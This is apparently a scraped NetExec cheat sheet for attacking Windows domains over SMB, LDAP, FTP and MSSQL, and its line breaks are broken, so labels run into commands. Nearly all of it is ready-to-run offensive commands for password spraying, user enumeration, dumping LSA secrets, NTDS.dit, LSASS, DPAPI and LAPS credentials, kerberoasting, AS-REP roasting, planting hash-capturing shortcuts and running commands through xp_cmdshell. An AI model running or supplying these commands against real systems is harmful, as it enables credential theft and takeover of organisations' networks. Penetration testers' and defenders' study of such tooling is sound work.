netexec
smb
initial enumeration
netexec smb targetnull authentication
netexec smb target -u '' -p ''guest authentication
netexec smb target -u 'guest' -p ''list shares
netexec smb target -u '' -p '' --sharesnetexec smb target -u username -p password --shareslist usernames
netexec smb target -u '' -p '' --usersnetexec smb target -u '' -p '' --rid-brutenetexec smb target -u username -p password --userslocal authentication
netexec smb target -u username -p password --local-authusing kerberos
netexec smb target -u username -p password -kpassword spray
netexec smb target -u users.txt -p password --continue-on-successnetexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-successnetexec ssh target -u username -p password --continue-on-successall in one
netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-polspider_plus module
netexec smb target -u username -p password -M spider_plusnetexec smb target -u username -p password -k --get-file target_file output_file --share sharenamedump a specific file
netexec smb target -u username -p password -k --get-file target_file output_file --share sharenamedump lsa secrets
netexec smb target -u username -p password --local-auth --lsagroup policy preferences
netexec smb target -u username -p password -M gpp_passworddump laps v1 and v2 password
netexec smb target -u username -p password --lapsdump dpapi credentials
netexec smb target -u username -p password --laps --dpapidump ntds.dit
netexec smb target -u username -p password --ntdswebdav - checks whether the webclient service is running on the target
netexec smb ip -u username -p password -M webdav veeam - extracts credentials from local veeam sql database
netexec smb target -u username -p password -M veeamslinky - creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
netexec smb ip -u username -p password -M slinky ntdsutil - dump ntds with ntdsutil
netexec smb ip -u username -p password -M ntdsutildump lsass
netexec smb target -u username -p password -M lsassyretrieve msol account password
netexec smb target -u username -p password -M msolftp
list folders and files
netexec ftp target -u username -p password --lslist files inside a folder
netexec ftp target -u username -p password --ls folder_nameretrieve a specific file
netexec ftp target -u username -p password --ls folder_name --get file_nameldap
enumerate users using ldap
netexec ldap target -u '' -p '' --usersall in one
netexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groupskerberoast
netexec ldap target -u username -p password --kerberoasting kerb.txtasreproast
netexec ldap target -u username -p password --asreproast asrep.txtgmsa
netexec ldap target -u username -p password --gmsa-convert-id idnetexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_accountcheck the machine account quota
netexec ldap target -u username -p password -M maqadcs enumeration
netexec ldap target -u username -p password -M adcsbloodhound
netexec ldap target -u username -p password --bloodhound -ns ip --collection Allmssql
- authentication
netexec mssql target -u username -p passwordexecute commands using xp_cmdshell
netexec mssql target -u username -p password -x command_to_execute-X for powershell and -x for cmd
get a file
netexec mssql target -u username -p password --get-file output_file target_file